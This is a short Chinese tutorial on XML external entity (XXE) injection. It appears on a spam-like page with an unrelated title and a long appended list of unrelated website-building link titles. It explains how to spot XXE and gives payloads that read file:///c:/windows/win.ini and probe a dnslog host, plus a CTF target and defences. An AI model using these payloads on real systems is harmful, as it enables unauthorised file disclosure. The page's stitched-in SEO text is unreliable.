当前位置: 首页 > news >正文

做最好的在线看片网站百度做网站的

做最好的在线看片网站,百度做网站的,wordpress会员关注,网站制作合同书一、概述 1、XXE:XML外部实体注入攻击 2、XML:可扩展标记语言。 (1)没有固定标签,所有标签都可以自定义,但有限制规则。 (2)用于数据对的传输与存储,常被用于充当配置文件 推荐教程:XML 教程 (3)后缀…

一、概述

1、XXE:XML外部实体注入攻击

2、XML:可扩展标记语言。

(1)没有固定标签,所有标签都可以自定义,但有限制规则。

(2)用于数据对的传输与存储,常被用于充当配置文件

推荐教程:XML 教程

(3)后缀名:*.xml

(4)语法规则:格式正确完整

3、XXE攻击原理:攻击者通过恶意的外部实体,当解析者解析包含恶意外部实体且未对其进行过滤,造成命令执行,目录遍历。

二、利用

1、存在:

  • 看URL是.ashx后缀
  • 存在明显的XML标签
  • 是POST请求,content-type:application/xml、text/xml、application/json(发现更改为application/xml看看)

2、限制条件:是否开启外部实体解析

3、攻击方式:有回显和无回显(盲攻击)

4、Payload:

#尝试,判断漏洞存在
<?xml version="1.0"?>
<!DOCTYPE info [
<!ENTITY xxe "你好" > ]>
<info>&xxe;</info>
#利用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)

(1)、修改payload

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE info [
<!ENTITY xxe SYSTEM
"http://dnslog.cn暂时域名" >
]>
<info>&xxe;</info>

(2)、回到dnslog网址看是否有域名解析了

6、练习(ctf题目):http://web.jarvisoj.com:9882/

7、思路

  • 无回显,BP抓包
  • 判断是否存在xxe漏洞
  • 深度利用

三、补充

1、工具:XXE injector

资料:https://www.cnblogs.com/AgainKjh/p/14639186.html

2、防御

  • 升级版本,禁止外部实体解析
  • 过滤用户提交的数据
http://www.bjxfkj.com.cn/article/110655.html

相关文章:

  • 建站系统主要包括企业网站系统wordpress 修改admin
  • 商务网站内容维护范围网站开发岗位名称
  • 中建南方建设集团官方网站网站建设评比标准
  • 官方网站 优帮云免费发广告平台
  • 松江洞泾网站建设如何建自己网站做淘宝客
  • 浦项建设公司员工网站wordpress拼图
  • 商城展示网站建设杭州建设厅官方网站
  • 湖北专业网站建设大全可以做硬件外包项目的网站
  • 苏州网站设计公司官网上市的网站设计公司
  • 网站建设购买什么境外主机开发者软件下载
  • 网站地图怎么做、刷赞网站推广qq免费
  • 动漫网站html网站建设在会计里算什么资产
  • 移动端网站定制今天开始做魔王免费观看网站
  • 可以做推广的门户网站领动云建站
  • 优惠券网站怎么做母婴会所网站建设
  • 哪个网站发布招聘信息免费泰安建设工程信息网
  • 情人节网站源码下载好项目推荐平台
  • 免费学校网站模板wordpress 框架嵌入
  • 用dw建立网站杭州品牌网站建设
  • 建一个展示的网站要多少钱wordpress 字母标签页
  • 默认网站预览能能显示建设中qq营销网站源码
  • 关于网站建设方案常州网站建设青之峰
  • 上海建设银行网站设计网站建设合同书6
  • 外贸网站外包用超轻粘土做网站
  • js源码下载从哪个网站能下载wordpress 主机销售
  • 外国做家具的网站电话销售-网站建设-开场白
  • 俄语网站制作lol网站怎么做
  • 网站模仿算侵权吗wordpress如何发布文件夹
  • 响应式网站哪里做百度一下就知道官网
  • 网站做不做账app开发流程表